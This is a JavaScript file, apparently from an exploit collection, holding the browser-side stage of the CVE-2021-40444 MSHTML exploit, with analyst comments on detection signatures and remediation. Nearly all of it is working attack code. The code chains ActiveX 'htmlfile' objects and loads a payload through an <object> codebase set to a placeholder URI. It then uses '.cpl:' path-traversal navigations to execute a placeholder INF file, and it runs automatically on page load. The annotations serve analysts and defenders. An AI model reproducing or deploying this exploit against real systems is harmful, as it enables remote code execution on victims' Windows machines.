data/exploits/CVE-2021-40444/cve_2021_40444.js
/**
 * Browser-side stage of the CVE-2021-40444 sample named in the file path.
 *
 * Reading notes for analysts:
 * - REPLACE_URI and REPLACE_INF are template placeholders. Nothing in this file
 *   fills them in, so they are presumably substituted by whatever generates the
 *   served page.
 * - Every property access uses bracket-string form and the local names are
 *   unrelated to their contents (e.g. `then` holds createElement, `errors` holds
 *   XMLHttpRequest). The string literals themselves are left in clear text, so
 *   "htmlfile", "codebase", "classid" and the ".cpl:" prefix remain usable for
 *   content signatures.
 * - `_0x4d7c02`, `newAttributes` and `fake` are assigned but never read in this
 *   function.
 *
 * Takes no parameters and returns nothing; everything it does is a side effect
 * on the hosting document and on the ActiveX objects it creates.
 */
function exploit() {
// Grab the DOM primitives straight from the prototypes and invoke them with
// .call() below, rather than through the instance methods.
var x = window["document"];
var then = window["Document"]["prototype"]["createElement"];
var _0x4d7c02 = window["Document"]["prototype"]["write"];
var PL$22 = window["HTMLElement"]["prototype"]["appendChild"];
var opfilter = window["HTMLElement"]["prototype"]["removeChild"];
// Create an <iframe> and attach it to <body>, falling back to the root element
// if the first append throws.
var range = then["call"](x, "iframe");
try {
PL$22["call"](x["body"], range);
} catch (errx) {
PL$22["call"](x["documentElement"], range);
}
// Take the ActiveXObject constructor from the iframe's window (not the top
// window) and use it to instantiate an "htmlfile" document object.
var ACTIVEX = range["contentWindow"]["ActiveXObject"];
var view = new ACTIVEX("htmlfile");
range["contentDocument"]["open"]()["close"]();
// The iframe is detached again; `view` is still used afterwards.
try {
opfilter["call"](x["body"], range);
} catch (err) {
opfilter["call"](x["documentElement"], range);
}
// Build a chain of nested "htmlfile" objects, each one created through the
// Script.ActiveXObject of the previous one: view -> mappedObj -> TokenType -> model.
// NOTE(review): the reason for the nesting depth is not stated in this file.
view["open"]()["close"]();
var mappedObj = new (view["Script"]["ActiveXObject"])("htmlFile");
mappedObj["open"]()["close"]();
var TokenType = new (mappedObj["Script"]["ActiveXObject"])("htmlFile");
TokenType["open"]()["close"]();
var model = new (TokenType["Script"]["ActiveXObject"])("htmlFile");
model["open"]()["close"]();
// Six further "htmlfile" objects created through the global ActiveXObject;
// five of them receive the ".cpl:" location writes at the end of the function.
var iedom = new ActiveXObject("htmlfile");
var rp_test = new ActiveXObject("htmlfile");
var wmp_test = new ActiveXObject("htmlfile");
var doc = new ActiveXObject("htmlfile");
var a = new ActiveXObject("htmlfile");
var fake = new ActiveXObject("htmlfile");
// GET request to REPLACE_URI. `![]` evaluates to false, so the third argument
// of open() makes the request synchronous. The response is never read here.
// NOTE(review): presumably issued only so the resource is fetched before the
// <object> below references the same URI - confirm against the generator.
var errors = window["XMLHttpRequest"];
var $node = new errors;
var directiveProcessors = errors["prototype"]["open"];
var nodeTypeRender = errors["prototype"]["send"];
var newAttributes = window["setTimeout"];
directiveProcessors["call"]($node, "GET", "REPLACE_URI", ![]);
nodeTypeRender["call"]($node);
// Inside the innermost htmlfile document: write a <body>, then append an
// <object> whose codebase is REPLACE_URI (with a "#version=" suffix) and whose
// classid is a fixed CLSID. The CLSID is not explained anywhere in this file.
// An <object> carrying both codebase and classid inside script-created
// htmlfile content is a useful hunting pattern for this sample.
model["Script"]["document"]["write"]("<body>");
var PL$41 = then["call"](model["Script"]["document"], "object");
PL$41["setAttribute"]("codebase", "REPLACE_URI#version=5,0,0,0");
PL$41["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
PL$22["call"](model["Script"]["document"]["body"], PL$41);
// Nine identical writes of ".cpl:123" to the same location property.
// NOTE(review): no purpose is visible in the code; possibly a delay or retry
// filler - confirm before relying on it in a signature.
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
// Navigate the htmlfile objects to ".cpl:" URLs that use "../" traversal to
// reach REPLACE_INF under several Temp and Temp/Low locations. The variants
// differ only in traversal depth and path prefix, presumably to cover
// different starting directories. Detection: a ".cpl:" URL combined with "../"
// and a Temp path is distinctive in page content, and a Control Panel item
// being resolved from a Temp directory is worth alerting on at the host.
// Remediation is the vendor security update for CVE-2021-40444.
iedom["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/Low/REPLACE_INF";
rp_test["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/REPLACE_INF";
wmp_test["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/Low/REPLACE_INF";
doc["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/REPLACE_INF";
a["Script"]["location"] = ".cpl:../../../../../Temp/Low/REPLACE_INF";
doc["Script"]["location"] = ".cpl:../../../../../Temp/REPLACE_INF";
doc["Script"]["location"] = ".cpl:../../Low/REPLACE_INF";
doc["Script"]["location"] = ".cpl:../../REPLACE_INF";
}
// Invoked unconditionally at script load; this file contains no user-interaction
// or environment check before the call.
exploit();